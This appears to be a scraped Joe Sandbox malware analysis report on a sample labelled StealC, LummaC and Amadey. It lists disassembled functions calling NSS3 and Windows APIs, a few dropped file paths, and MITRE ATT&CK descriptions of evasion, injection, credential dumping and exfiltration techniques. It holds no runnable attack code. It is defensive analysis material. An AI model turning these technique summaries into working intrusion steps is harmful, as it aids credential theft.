Instruction ID: ed2acfdba7ff607e2594a8f0f5acb5a48395dccff3525724e371ea9c1c3bf31e
Opcode Fuzzy Hash: 017a37c67e920a315a13f3fe078d0cbe7b378287ec6cf16495784fb71eebf7b5
Instruction Fuzzy Hash: 5C0125B6E001085BDB009A58ED059BABB75EFC0308F144429ED485BB11F732AD1487A2

Function 6C7E4CF0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

SECOID_FindOIDByTag_Util.NSS3('8~l,00000000,00000000,?,?,6C7E3827,?,00000000), ref: 6C7E4D0A

Part of subcall function 6C7D0840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C7D08B4

SECITEM_ItemsAreEqual_Util.NSS3(00000000,00000000,00000000), ref: 6C7E4D22

Part of subcall function 6C7CFD30: memcmp.VCRUNTIME140(?,AF840FC0,8B000000,?,6C771A3E,00000048,00000054), ref: 6C7CFD56

Strings

'8~l, xrefs: 6C7E4D07

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Util$Equal_ErrorFindItemsTag_memcmp
String ID: '8~l
API String ID: 1521942269-3277948344
Opcode ID: 14028aa1c084b1134f31e0fe545c68cf4cce508ec734b29011f619df16d7203e
Instruction ID: 14b88311de2a8c24bd9814c1e7f1e0e155d9228babcf0038d57b265bbd2928f3
Opcode Fuzzy Hash: 14028aa1c084b1134f31e0fe545c68cf4cce508ec734b29011f619df16d7203e
Instruction Fuzzy Hash: B5F09C3360113557DB108DEA9E4578736DC9B4967DF1502B1DE18CBB81E631DC04D6D1

Function 6C80AF70 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

PR_GetUniqueIdentity.NSS3(SSL), ref: 6C80AF78

Part of subcall function 6C76ACC0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C76ACE2
Part of subcall function 6C76ACC0: malloc.MOZGLUE(00000001), ref: 6C76ACEC
Part of subcall function 6C76ACC0: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6C76AD02
Part of subcall function 6C76ACC0: TlsGetValue.KERNEL32 ref: 6C76AD3C
Part of subcall function 6C76ACC0: calloc.MOZGLUE(00000001,?), ref: 6C76AD8C
Part of subcall function 6C76ACC0: PR_Unlock.NSS3 ref: 6C76ADC0
Part of subcall function 6C76ACC0: PR_Unlock.NSS3 ref: 6C76AE8C
Part of subcall function 6C76ACC0: free.MOZGLUE(?), ref: 6C76AEAB

memcpy.VCRUNTIME140(6C8D3084,6C8D02AC,00000090), ref: 6C80AF94

Strings

SSL, xrefs: 6C80AF73

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Unlock$IdentityUniqueValuecallocfreemallocmemcpystrcpystrlen
String ID: SSL
API String ID: 2424436289-2135378647
Opcode ID: 1a699602c92649c46315f1d239454c2203172b82bc56c24efa8f1a196e4f4e4f
Instruction ID: 5288de2edf472615e7704720d86234fd2da7c95328726bc85a96001d5712e691
Opcode Fuzzy Hash: 1a699602c92649c46315f1d239454c2203172b82bc56c24efa8f1a196e4f4e4f
Instruction Fuzzy Hash: CC2108B2705A48AA8B30EF51AA477237AB1B30261CB945938C1191BF26D7316D4CDFE6

Function 6C77C810 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36timeCOMMON

Download Yara Rule

APIs

CERT_CheckCertValidTimes.NSS3(?,00000000,-00000078,00000000,?,00000000,]wl,6C776499,-00000078,00000000,?,?,]wl,?,6C775DEF,?), ref: 6C77C821

Part of subcall function 6C771DD0: DER_DecodeTimeChoice_Util.NSS3(?,?), ref: 6C771E0B
Part of subcall function 6C771DD0: DER_DecodeTimeChoice_Util.NSS3(?,?), ref: 6C771E24

SECKEY_DestroyPublicKey.NSS3(00000000,?,?,?,00000000,?,?,]wl,?,6C775DEF,?,?,?), ref: 6C77C857

Strings

]wl, xrefs: 6C77C810

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Choice_DecodeTimeUtil$CertCheckDestroyPublicTimesValid
String ID: ]wl
API String ID: 221937774-1799454423
Opcode ID: 8b4586f9bf7fe022698438743c8cc7a435e02df9751e3daf09b6801118977999
Instruction ID: ea5da4d33546a2540edb87c73ac5c4cd85026403f01861767b3ede5f2764e6df
Opcode Fuzzy Hash: 8b4586f9bf7fe022698438743c8cc7a435e02df9751e3daf09b6801118977999
Instruction Fuzzy Hash: 0BF0A773A0111C77EF112A666E0DAFE3A59DF8515AF040031FF18D6641F722C92587F1

Function 6C760F00 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON

Download Yara Rule

APIs

PR_GetPageSize.NSS3(6C760936,FFFFE8AE,?,6C6F16B7,00000000,?,6C760936,00000000,?,6C6F204A), ref: 6C760F1B

Part of subcall function 6C761370: GetSystemInfo.KERNEL32(?,?,?,?,6C760936,?,6C760F20,6C760936,FFFFE8AE,?,6C6F16B7,00000000,?,6C760936,00000000), ref: 6C76138F

PR_NewLogModule.NSS3(clock,6C760936,FFFFE8AE,?,6C6F16B7,00000000,?,6C760936,00000000,?,6C6F204A), ref: 6C760F25

Part of subcall function 6C761110: calloc.MOZGLUE(00000001,0000000C,?,?,?,?,?,?,?,?,?,?,6C760936,00000001,00000040), ref: 6C761130
Part of subcall function 6C761110: strdup.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,6C760936,00000001,00000040), ref: 6C761142
Part of subcall function 6C761110: PR_GetEnvSecure.NSS3(NSPR_LOG_MODULES,?,?,?,?,?,?,?,?,?,?,?,?,?,6C760936,00000001), ref: 6C761167

Strings

clock, xrefs: 6C760F20

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: InfoModulePageSecureSizeSystemcallocstrdup
String ID: clock
API String ID: 536403800-3195780754
Opcode ID: e731fff55e9371f81c8d3c3c2e048ba8f811e912475d452494f70806ade457d6
Instruction ID: 61929b0b87c4588932b92136ba46bfab1a1f9cad0c9cd5dda9a8de449e537789
Opcode Fuzzy Hash: e731fff55e9371f81c8d3c3c2e048ba8f811e912475d452494f70806ade457d6
Instruction Fuzzy Hash: 78D0123160414457C52166979D4DB96B6ACC7C33BDF104836E50982E104A69A8EBD7A9

Function 6C7D0DB0 Relevance: 5.1, APIs: 4, Instructions: 97COMMON

Download Yara Rule

APIs

calloc.MOZGLUE ref: 6C7D0DF5
TlsGetValue.KERNEL32 ref: 6C7D0E2D
TlsGetValue.KERNEL32 ref: 6C7D0E58
TlsGetValue.KERNEL32 ref: 6C7D0E84

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Value$calloc
String ID:
API String ID: 3339632435-0
Opcode ID: 005b7d311062e9d650b6d584e14bce5770ea81111895727b82966556dcac03c5
Instruction ID: b9c7916fb01f9b381a93057360f567a8a359bd020bb0ef244caf01cef47716e8
Opcode Fuzzy Hash: 005b7d311062e9d650b6d584e14bce5770ea81111895727b82966556dcac03c5
Instruction Fuzzy Hash: 21319070A453868BDB20BF3996882597BB8BF0630CF46567DDC8887A11EB34E495CBC1

Function 6C7D0F10 Relevance: 5.1, APIs: 4, Instructions: 52stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,?,?,6C772AF5,?,?,?,?,?,6C770A1B,00000000), ref: 6C7D0F1A
malloc.MOZGLUE(00000001), ref: 6C7D0F30
memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6C7D0F42
TlsGetValue.KERNEL32 ref: 6C7D0F5B

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Valuemallocmemcpystrlen
String ID:
API String ID: 2332725481-0
Opcode ID: 075f987c3b8b649c5ce005a465267a9db6a8306b4dc2d8041fe112a23c30ced7
Instruction ID: 987d57fc49b6f6251de7a21453bb899bc401ad5c2e770e8f7d30277c6ed8a985
Opcode Fuzzy Hash: 075f987c3b8b649c5ce005a465267a9db6a8306b4dc2d8041fe112a23c30ced7
Instruction Fuzzy Hash: 0701FCB1E012905BEB202B3E9F089567AACEF5325DF161535EC1CC2E21E730E955C6E3

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject malicious code into process via Extra Window Memory (EWM) in order to evade process-based defenses as well as possibly elevate privileges. EWM injection is a method of executing arbitrary code in the address space of a separate live process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Process: OS API Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads (ex: `rundll32.exe {DLLname, DLLfunction}` ).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: StealC

Threatname: LummaC

Threatname: Amadey

Yara Signatures

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Phishing

Compliance

Spreading

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

LLM Input / Output

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\DHDAKFCG

C:\ProgramData\FBFIJJEB

C:\ProgramData\GIJKKKFCFHCFIECBGDHI

C:\ProgramData\IIJEBAECGCBKECAAAEBFBGHJJE

Windows Analysis Report
file.exe

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre